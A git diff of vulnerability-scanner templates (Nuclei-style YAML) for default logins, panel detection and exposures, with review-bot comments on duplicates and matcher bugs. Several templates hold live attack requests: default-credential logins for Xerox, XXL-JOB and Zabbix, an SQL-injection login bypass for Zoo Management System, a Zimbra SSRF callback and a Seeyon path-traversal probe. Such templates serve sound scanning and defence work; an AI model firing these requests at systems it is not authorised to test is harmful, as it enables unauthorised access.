- type: status status: - 200 - - type: word part: body words: - "window.opener.top.location.pathname" - "Xerox Corporation" condition: and - - type: word part: body words: - "invalid" - "errmsg" condition: or - negative: true \ No newline at end of file + negative: true + +# Enhanced by mp on 2022/03/13 diff --git a/poc/auth/xerox7-default-login.yaml b/poc/auth/xerox7-default-login.yaml new file mode 100644 index 0000000000..56e300388a --- /dev/null +++ b/poc/auth/xerox7-default-login.yaml 
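Review bot: The new `description` reads `Xerox WorkCentre 7xxx printer. default admin credentials admin:1111 were discovered.`, with a stray full stop that splits the sentence; `description: Xerox WorkCentre 7xxx printer default admin credentials (admin:1111) were discovered.` reads correctly. The patch also adds poc/auth/xerox7-default-login.yaml with the same `id: xerox7-default-login` and the pre-change text, so two templates with one id and different metadata will coexist.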
@@ -0,0 +1,46 @@ +id: xerox7-default-login + +info: + name: Xerox WorkCentre 7xxx - Default Login + author: MiroslavSotak + severity: high + description: Testing default credentials admin:1111 on Xerox WorkCentre 7xxx printer. + tags: xerox,default-login + reference: https://www.support.xerox.com/en-us/article/en/x_wc7556_en-O23530 + +requests: + - raw: + - | + POST /userpost/xerox.set HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername={{username}}&webPassword={{password}}&frmaltDomain=default + + attack: pitchfork + payloads: + username: + - admin + password: + - 1111 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "window.opener.top.location.pathname" + - "Xerox Corporation" + condition: and + + - type: word + part: body + words: + - "invalid" + - "errmsg" + condition: or + negative: true \ No newline at end of file diff --git a/poc/auth/xvr-login-11704.yaml b/poc/auth/xvr-login-11704.yaml index d638c70dd8..13f9f39ce6 100644 --- a/poc/auth/xvr-login-11704.yaml +++ b/poc/auth/xvr-login-11704.yaml @@ -1,20 +1,24 @@ id: xvr-login + info: name: XVR LOGIN author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"XVR LOGIN" + reference: + - https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22 tags: panel,xvr + requests: - method: GET path: - '{{BaseURL}}/login.rsp' + matchers-condition: and matchers: - type: word words: - 'XVR LOGIN' + - type: status status: - 200 diff --git a/poc/auth/xvr-login-11705.yaml b/poc/auth/xvr-login-11705.yaml new file mode 100644 index 0000000000..ce1449f791 --- /dev/null +++ b/poc/auth/xvr-login-11705.yaml 
@@ -0,0 +1,20 @@ +id: xvr-login +info: + name: XVR LOGIN + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22 + tags: panel,xvr +requests: + - method: GET + path: + - '{{BaseURL}}/login.rsp' + matchers-condition: and + matchers: + - type: word + words: + - 'XVR LOGIN' + - type: status + status: + - 200 diff --git a/poc/auth/xxljob-default-login-11709.yaml b/poc/auth/xxljob-default-login-11709.yaml deleted file mode 100644 index 5fead39967..0000000000 --- a/poc/auth/xxljob-default-login-11709.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: xxljob-default-login - -info: - name: XXL-JOB Default Login - author: pdteam - severity: high - tags: default-login,xxljob - description: XXL-JOB default admin credentials were discovered. - reference: - - https://github.com/xuxueli/xxl-job - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 - -requests: - - raw: - - | - POST /xxl-job-admin/login HTTP/1.1 - Host:{{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - userName={{username}}&password={{password}} - - payloads: - username: - - admin - password: - - 123456 - attack: pitchfork - - matchers-condition: and - matchers: - - type: word - words: - - '"code":200' - - '"msg"' - - '"content"' - condition: and - - - type: word - words: - - 'application/json' - - 'XXL_JOB_LOGIN_IDENTITY' - part: header - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/xxljob-default-login-11712.yaml b/poc/auth/xxljob-default-login-11712.yaml index 11e08ec55c..e7972df7bd 100644 --- a/poc/auth/xxljob-default-login-11712.yaml +++ b/poc/auth/xxljob-default-login-11712.yaml 
@@ -1,12 +1,16 @@ id: xxljob-default-login - info: name: XXL-JOB Default Login author: pdteam severity: high + description: XXL-JOB default admin credentials were discovered. + reference: + - https://github.com/xuxueli/xxl-job + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,xxljob - reference: https://github.com/xuxueli/xxl-job - requests: - raw: - | @@ -15,14 +19,12 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 userName={{username}}&password={{password}} - payloads: username: - admin password: - 123456 attack: pitchfork - matchers-condition: and matchers: - type: word @@ -31,14 +33,14 @@ requests: - '"msg"' - '"content"' condition: and - - type: word words: - 'application/json' - 'XXL_JOB_LOGIN_IDENTITY' part: header condition: and - - type: status status: - 200 + +# Enhanced by mp on 2022/03/14 diff --git a/poc/auth/zabbix-default-credentials.yaml b/poc/auth/zabbix-default-credentials.yaml index da0f08e602..246a9ed52a 100644 --- a/poc/auth/zabbix-default-credentials.yaml +++ b/poc/auth/zabbix-default-credentials.yaml @@ -1,11 +1,9 @@ id: zabbix-default-credentials - info: name: Zabbix Default Credentials author: pdteam severity: critical tags: zabbix,default-login - requests: - method: POST path: @@ -13,15 +11,12 @@ requests: headers: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest - body: name=Admin&password=zabbix&autologin=1&enter=Sign+in - matchers-condition: and matchers: - type: word words: - "zabbix.php?action=dashboard.view" - - type: status status: - - 302 \ No newline at end of file + - 302 diff --git a/poc/auth/zabbix-server-login-11767.yaml b/poc/auth/zabbix-server-login-11767.yaml index 44aa8646f2..a78a6b03b3 100644 --- a/poc/auth/zabbix-server-login-11767.yaml +++ b/poc/auth/zabbix-server-login-11767.yaml 
@@ -3,7 +3,8 @@ info: name: Zabbix Login author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 tags: panel,zabbix requests: - method: GET diff --git a/poc/auth/zabbix-server-login-11769.yaml b/poc/auth/zabbix-server-login-11769.yaml new file mode 100644 index 0000000000..aa225ec9d5 --- /dev/null +++ b/poc/auth/zabbix-server-login-11769.yaml @@ -0,0 +1,23 @@ +id: zabbix-server-login + +info: + name: Zabbix Login + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22zabbix-server%3A+Zabbix%22 + tags: panel,zabbix + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "zabbix-server: Zabbix" + - type: status + status: + - 200 diff --git a/poc/auth/zeroshell-login-11788.yaml b/poc/auth/zeroshell-login-11788.yaml new file mode 100644 index 0000000000..1f3fb79b7b --- /dev/null +++ b/poc/auth/zeroshell-login-11788.yaml @@ -0,0 +1,20 @@ +id: zeroshell-login +info: + name: ZeroShell Login + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"ZeroShell"' + tags: panel,zeroshell +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers-condition: and + matchers: + - type: word + words: + - 'ZeroShell' + - type: status + status: + - 200 diff --git a/poc/auth/zeroshell-login-11790.yaml b/poc/auth/zeroshell-login-11790.yaml deleted file mode 100644 index 690b4d8c41..0000000000 --- a/poc/auth/zeroshell-login-11790.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: zeroshell-login -info: - name: ZeroShell Login - author: dhiyaneshDK - severity: info - metadata: - shodan-query: http.title:"ZeroShell" - tags: panel,zeroshell -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers-condition: and - matchers: - - type: word - words: - - 'ZeroShell' - - type: status - status: - - 200 diff --git a/poc/auth/zeroshell-login.yaml b/poc/auth/zeroshell-login.yaml index 1f3fb79b7b..19e56fec49 100644 --- a/poc/auth/zeroshell-login.yaml +++ b/poc/auth/zeroshell-login.yaml @@ -1,20 +1,32 @@ id: zeroshell-login + info: - name: ZeroShell Login + name: ZeroShell Panel - Detect author: dhiyaneshDK severity: info + description: ZeroShell panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - shodan-query: 'http.title:"ZeroShell"' + max-request: 1 + shodan-query: http.title:"ZeroShell" tags: panel,zeroshell -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - 'ZeroShell' + - type: status status: - 200 + +# digest: 4b0a00483046022100e334b7100e2310a5bcbdf4aa1eab82088cfdeeaf31cd53f3a2b69f766a70fbbd022100981de431f87e4d06d38a8d5805cb16ce10f3a6da957ad08002d92432d8017ea0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/zhiyuan-oa-session-leak-11802.yaml b/poc/auth/zhiyuan-oa-session-leak-11802.yaml new file mode 100644 index 0000000000..382a4c4ca9 --- /dev/null +++ b/poc/auth/zhiyuan-oa-session-leak-11802.yaml 
@@ -0,0 +1,22 @@ +id: zhiyuan-oa-session-leak +info: + name: Zhiyuan OA Session Leak + author: pikpikcu + severity: medium + description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. + reference: https://www.zhihuifly.com/t/topic/3345 + tags: zhiyuan,leak,disclosure +requests: + - method: GET + path: + - "{{BaseURL}}/yyoa/ext/https/getSessionList.jsp?cmd=getAll" + matchers-condition: and + matchers: + - type: word + words: + - "" + - "" + condition: and + - type: status + status: + - 200 diff --git a/poc/auth/zhiyuan-oa-session-leak-11801.yaml b/poc/auth/zhiyuan-oa-session-leak.yaml similarity index 100% rename from poc/auth/zhiyuan-oa-session-leak-11801.yaml rename to poc/auth/zhiyuan-oa-session-leak.yaml diff --git a/poc/auth/zhiyuan-oa-unauthorized-11806.yaml b/poc/auth/zhiyuan-oa-unauthorized-11806.yaml new file mode 100644 index 0000000000..b6c35dfbf4 --- /dev/null +++ b/poc/auth/zhiyuan-oa-unauthorized-11806.yaml @@ -0,0 +1,25 @@ +id: zhiyuan-oa-unauthorized +info: + name: Zhiyuan Oa Unauthorized + author: pikpikcu + severity: low + reference: https://buaq.net/go-53721.html + tags: seeyon,unauth,zhiyuan +requests: + - method: GET + path: + - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile" + matchers-condition: and + matchers: + - type: word + words: + - "serverIdentifier" + - "companyName" + condition: and + - type: word + words: + - "application/json" + part: header + - type: status + status: + - 200 diff --git a/poc/auth/zhiyuan-oa-unauthorized-11808.yaml b/poc/auth/zhiyuan-oa-unauthorized-11808.yaml deleted file mode 100644 index 7b0f97c9ef..0000000000 --- a/poc/auth/zhiyuan-oa-unauthorized-11808.yaml +++ /dev/null 
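Review bot: Both entries of the `words` matcher in the new poc/auth/zhiyuan-oa-session-leak-11802.yaml appear here as empty strings (`- ""`). An empty word is contained in every response body, so with `condition: and` the template reduces to the `status: 200` check on `getSessionList.jsp?cmd=getAll`. Any host that answers 200 on that path would then be reported as a medium-severity session leak. The literals may be markup that was lost when this page was rendered. If the file really holds empty strings, replace them with the element names the endpoint returns, so the finding depends on session data actually being present.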
@@ -1,26 +0,0 @@ -id: zhiyuan-oa-unauthorized -info: - name: Zhiyuan Oa Unauthorized - author: pikpikcu - severity: low - reference: - - https://buaq.net/go-53721.html - tags: seeyon,unauth,zhiyuan -requests: - - method: GET - path: - - "{{BaseURL}}/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile" - matchers-condition: and - matchers: - - type: word - words: - - "serverIdentifier" - - "companyName" - condition: and - - type: word - words: - - "application/json" - part: header - - type: status - status: - - 200 diff --git a/poc/auth/zimbra-preauth-ssrf-11810.yaml b/poc/auth/zimbra-preauth-ssrf-11810.yaml index 8f955e0f3f..8b36af2c60 100644 --- a/poc/auth/zimbra-preauth-ssrf-11810.yaml +++ b/poc/auth/zimbra-preauth-ssrf-11810.yaml @@ -1,11 +1,17 @@ id: zimbra-preauth-ssrf info: - name: Zimbra Collaboration Suite (ZCS) - SSRF + name: Zimbra Collaboration Suite - Server-Side Request Forgery author: gy741 - severity: critical - description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + severity: medium + description: Zimbra Collaboration Suite (ZCS) allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-7796 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cve-id: CVE-2020-7796 + cwe-id: CWE-918 tags: zimbra,ssrf,oast requests: - raw: @@ -18,3 +24,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/06/03 diff --git a/poc/auth/zimbra-preauth-ssrf.yaml b/poc/auth/zimbra-preauth-ssrf.yaml new file mode 100644 index 0000000000..8f955e0f3f --- /dev/null 
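Review bot: Two templates with `id: zimbra-preauth-ssrf` now disagree on severity. The first hunk of poc/auth/zimbra-preauth-ssrf-11810.yaml lowers it to `severity: medium` with `cvss-score: 6.8`, while the poc/auth/zimbra-preauth-ssrf.yaml added by this same commit keeps `severity: critical` for the identical request and matcher. A scan that loads both will report the same finding under one id at two priorities, which makes triage and deduplication unreliable. Pick one rating, check it against the NVD entry for CVE-2020-7796 that this hunk adds as a reference, and apply it to both files or keep only one of them.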
+++ b/poc/auth/zimbra-preauth-ssrf.yaml @@ -0,0 +1,20 @@ +id: zimbra-preauth-ssrf +info: + name: Zimbra Collaboration Suite (ZCS) - SSRF + author: gy741 + severity: critical + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. + reference: + - https://www.adminxe.com/2183.html + tags: zimbra,ssrf,oast +requests: + - raw: + - | + GET /service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://{{interactsh-url}}%23.salesforce.com/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" diff --git a/poc/auth/zms-auth-bypass-11830.yaml b/poc/auth/zms-auth-bypass-11830.yaml new file mode 100644 index 0000000000..3ec26ec197 --- /dev/null +++ b/poc/auth/zms-auth-bypass-11830.yaml @@ -0,0 +1,33 @@ +id: zms-auth-bypass +info: + name: Zoo Management System 1.0 - Authentication Bypass + author: dwisiswant0 + severity: high + description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. + reference: https://www.exploit-db.com/exploits/48880 + tags: auth-bypass,zms +requests: + - raw: + - | + POST /zms/admin/index.php HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Content-Type: application/x-www-form-urlencoded + Origin: {{BaseURL}} + Referer: {{BaseURL}}/zms/admin/index.php + Cookie: PHPSESSID={{randstr}} + + username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= + redirects: true + max-redirects: 1 + matchers-condition: and + matchers: + - type: regex + regex: + - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" + - "ZMS ADMIN" + condition: and + part: body + - type: status + status: + - 200 
diff --git a/poc/auth/zms-auth-bypass-11832.yaml b/poc/auth/zms-auth-bypass-11832.yaml deleted file mode 100644 index 6c0bd3f73f..0000000000 --- a/poc/auth/zms-auth-bypass-11832.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: zms-auth-bypass -info: - name: Zoo Management System 1.0 - Authentication Bypass - author: dwisiswant0 - severity: high - description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. - reference: - - https://www.exploit-db.com/exploits/48880 - tags: auth-bypass,zms -requests: - - raw: - - | - POST /zms/admin/index.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Content-Type: application/x-www-form-urlencoded - Origin: {{BaseURL}} - Referer: {{BaseURL}}/zms/admin/index.php - Cookie: PHPSESSID={{randstr}} - - username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login= - redirects: true - max-redirects: 1 - matchers-condition: and - matchers: - - type: regex - regex: - - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)" - - "ZMS ADMIN" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/auth/zoho-webhook-token-11835.yaml b/poc/auth/zoho-webhook-token-11835.yaml index 7dd146b904..f3aa557a4a 100644 --- a/poc/auth/zoho-webhook-token-11835.yaml +++ b/poc/auth/zoho-webhook-token-11835.yaml @@ -3,7 +3,7 @@ info: name: Zoho Webhook Disclosure author: Ice3man severity: info - tags: exposure,token + tags: exposure,token,zoho requests: - method: GET path: diff --git a/poc/aws/amazon-docker-config-280.yaml b/poc/aws/amazon-docker-config-280.yaml deleted file mode 100644 index e1863a01a9..0000000000 --- a/poc/aws/amazon-docker-config-280.yaml +++ /dev/null 
@@ -1,28 +0,0 @@ -id: amazon-docker-config - -info: - name: Dockerrun AWS Configuration Page - Detect - author: pdteam - severity: medium - description: Dockerrun AWS configuration page was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure,aws,devops - -http: - - method: GET - path: - - '{{BaseURL}}/Dockerrun.aws.json' - - matchers: - - type: word - words: - - 'AWSEBDockerrunVersion' - - 'containerDefinitions' - condition: and - -# digest: 490a004630440220419fa6ed9cc0aeb4ea0fce6bfd87de25db115cd5fb3ead5589d7b1f316621aaf02200c591b0c798e7a2cb6961a14eb5061d6a6bd4dd3e015d58fb2b87ce2538a0b44:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/amazon-docker-config-disclosure-278.yaml b/poc/aws/amazon-docker-config-disclosure-278.yaml deleted file mode 100644 index 7e0c16546d..0000000000 --- a/poc/aws/amazon-docker-config-disclosure-278.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: amazon-docker-config-disclosure - -info: - name: Dockerrun AWS Configuration Exposure - author: pdteam - severity: medium - tags: config,exposure,aws,devops - -requests: - - method: GET - path: - - '{{BaseURL}}/Dockerrun.aws.json' - matchers: - - type: word - words: - - 'AWSEBDockerrunVersion' - - 'containerDefinitions' - condition: and diff --git a/poc/aws/amazon-docker-config-disclosure.yaml b/poc/aws/amazon-docker-config-disclosure.yaml index 8724431c98..87ab75f1f6 100644 --- a/poc/aws/amazon-docker-config-disclosure.yaml +++ b/poc/aws/amazon-docker-config-disclosure.yaml 
@@ -5,15 +5,9 @@ info: severity: medium tags: config,exposure,aws,devops requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - raw: - - | - GET /Dockerrun.aws.json HTTP/1.1 - Host: {{Subdomains}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' matchers: - type: word words: diff --git a/poc/aws/amazon-docker-config.yaml b/poc/aws/amazon-docker-config.yaml new file mode 100644 index 0000000000..4eaa175dfc --- /dev/null +++ b/poc/aws/amazon-docker-config.yaml @@ -0,0 +1,18 @@ +id: amazon-docker-config + +info: + name: Dockerrun AWS Configuration Exposure + author: pdteam + severity: medium + tags: config,exposure,aws,devops + +requests: + - method: GET + path: + - '{{BaseURL}}/Dockerrun.aws.json' + matchers: + - type: word + words: + - 'AWSEBDockerrunVersion' + - 'containerDefinitions' + condition: and diff --git a/poc/aws/amazon-mws-auth-token-11845.yaml b/poc/aws/amazon-mws-auth-token-11845.yaml index 8ed5b31604..0ab5703b9c 100644 --- a/poc/aws/amazon-mws-auth-token-11845.yaml +++ b/poc/aws/amazon-mws-auth-token-11845.yaml @@ -1,15 +1,11 @@ id: amazon-mws-auth-token-value info: - name: Amazon MWS Authentication Token - Detect + name: Amazon MWS Auth Token author: gaurang severity: medium - description: Amazon MWS authentication token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 tags: token,file,amazon,auth + file: - extensions: - all @@ -18,6 +14,3 @@ file: - type: regex regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022100a22e9ab4357449ff0b0d0e1d56fd2a2a815900eb260c13cdc8ca5b4904508d76022030e701c98fff70a3c0e8174fe27c30c87c60b0a4acdc97555a71970ab6e5e83a:922c64590222798bb761d5b6d8e72950 
diff --git a/poc/aws/amazon-mws-auth-token-282.yaml b/poc/aws/amazon-mws-auth-token-282.yaml index eb41de1dae..457df905b0 100644 --- a/poc/aws/amazon-mws-auth-token-282.yaml +++ b/poc/aws/amazon-mws-auth-token-282.yaml @@ -4,9 +4,11 @@ info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info + metadata: + max-request: 1 tags: exposure,token,aws,amazon,auth -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -16,3 +18,5 @@ requests: part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/amazon-mws-auth-token-283.yaml b/poc/aws/amazon-mws-auth-token-283.yaml index 457df905b0..28e8063f5e 100644 --- a/poc/aws/amazon-mws-auth-token-283.yaml +++ b/poc/aws/amazon-mws-auth-token-283.yaml @@ -1,22 +1,15 @@ id: amazon-mws-auth-token - info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - metadata: - max-request: 1 - tags: exposure,token,aws,amazon,auth - -http: + tags: exposure,token,aws +requests: - method: GET path: - "{{BaseURL}}" - extractors: - type: regex part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" - -# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-access-id-618.yaml b/poc/aws/aws-access-id-618.yaml deleted file mode 100644 index 1bf83e581c..0000000000 --- a/poc/aws/aws-access-id-618.yaml +++ /dev/null 
@@ -1,16 +0,0 @@ -id: aws-access-key - -info: - name: AWS Access Key ID - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/poc/aws/aws-access-id-620.yaml b/poc/aws/aws-access-id-620.yaml deleted file mode 100644 index 59db59bd29..0000000000 --- a/poc/aws/aws-access-id-620.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: aws-access-key - -info: - name: AWS Access Key ID - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" diff --git a/poc/aws/aws-access-id.yaml b/poc/aws/aws-access-id.yaml index f05c27ae8e..1bf83e581c 100644 --- a/poc/aws/aws-access-id.yaml +++ b/poc/aws/aws-access-id.yaml @@ -1,15 +1,11 @@ id: aws-access-key info: - name: Amazon Web Services Access Key ID - Detect + name: AWS Access Key ID author: gaurang severity: info - description: Amazon Web Services Access Key ID token was detected. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 tags: token,file + file: - extensions: - all @@ -18,6 +14,3 @@ file: - type: regex regex: - "(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}" - -# Enhanced by md on 2023/05/04 -# digest: 4a0a00473045022001180031643147e369ad54d397f6e1ec99e061e1a771b8ec6b9f024bb97300a7022100b5b3b3027d3e8edea6822f05c18070f5cbd64b111c6ac7aa37e3603fcb4b08ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-access-key-value-624.yaml b/poc/aws/aws-access-key-value-624.yaml new file mode 100644 index 0000000000..5cb8846e08 --- /dev/null +++ b/poc/aws/aws-access-key-value-624.yaml 
@@ -0,0 +1,22 @@ +id: aws-access-key-value + +info: + name: AWS Access Key ID Value + author: Swissky + severity: info + metadata: + max-request: 1 + tags: exposure,token,aws,amazon + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b" + +# digest: 4a0a004730450220593a92026bc21a26687f6e78f52259873c5643010bf2bf67aec0ad4e469ce40a022100bb56301e5df9b095b39838c76cc5cf37b469e84c9e488be380aa9f1dbfc3df00:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-bucket-service-628.yaml b/poc/aws/aws-bucket-service-628.yaml deleted file mode 100644 index be2129c807..0000000000 --- a/poc/aws/aws-bucket-service-628.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: aws-bucket-service - -info: - name: Detect websites using AWS bucket storage - author: pdteam - severity: info - metadata: - max-request: 1 - tags: aws,tech,bucket - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: dsl - dsl: - - contains(tolower(header), 'x-amz-bucket') - - contains(tolower(header), 'x-amz-request') - - contains(tolower(header), 'x-amz-id') - - contains(tolower(header), 'amazons3') - condition: or - - - type: dsl - dsl: - - contains(tolower(header), 'x-guploader-uploadid') - negative: true - -# digest: 4a0a00473045022100f73a2c41da2dc0ac4cb9dd81f1a0637b1124ec077a35301154e14bfc8e582c2202204363b40659aa173eb2bf958820e33aa56563658585a189da5f630a39121e10e2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/aws/aws-bucket-service.yaml b/poc/aws/aws-bucket-service.yaml new file mode 100644 index 0000000000..fb12d1953b --- /dev/null +++ b/poc/aws/aws-bucket-service.yaml 
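Review bot: The extractor regex in the new poc/aws/aws-access-key-value-624.yaml is a double-quoted YAML scalar containing a single-backslash `\b`. YAML decodes that as a backspace character (0x08), not as a regex word boundary. The pattern then needs a literal backspace on both sides of the key, so exposed access key IDs in a page body will not be extracted and the template fails silently. The other regexes in this commit double their backslashes inside double quotes (`amzn\\.mws\\.`). Do the same here, or use single quotes: `- '\b(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b'`.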
@@ -0,0 +1,27 @@ +id: aws-bucket-service + +info: + name: Detect websites using AWS bucket storage + author: pdteam + severity: info + tags: aws,tech,bucket + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-amz-bucket') + - contains(tolower(all_headers), 'x-amz-request') + - contains(tolower(all_headers), 'x-amz-id') + - contains(tolower(all_headers), 'amazons3') + condition: or + + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-guploader-uploadid') + negative: true diff --git a/poc/aws/aws-cloudfront-service-634.yaml b/poc/aws/aws-cloudfront-service-634.yaml index 2e4626000b..26ab05d613 100644 --- a/poc/aws/aws-cloudfront-service-634.yaml +++ b/poc/aws/aws-cloudfront-service-634.yaml @@ -5,11 +5,9 @@ info: author: jiheon-dev severity: info description: Detect websites using AWS cloudfront service - metadata: - max-request: 1 tags: aws,tech,service -http: +requests: - method: GET path: - "{{BaseURL}}" @@ -18,9 +16,7 @@ http: - type: dsl condition: or dsl: - - "contains(tolower(header), 'x-cache: hit from cloudfront')" - - "contains(tolower(header), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(header), 'x-cache: miss from cloudfront')" - - "contains(tolower(header), 'x-cache: error from cloudfront')" - -# digest: 490a0046304402205194b5f1c14b4bbbe7a92308b198368f53a70c03cb4b4313bcc1ba95f7ed2d55022029fdac767b00d013e9f912c931baee9e352913fc826b8454e788c3c8c6ea5dd3:922c64590222798bb761d5b6d8e72950 + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/poc/aws/aws-cloudfront-service-635.yaml b/poc/aws/aws-cloudfront-service-635.yaml deleted file mode 100644 index 26ab05d613..0000000000 
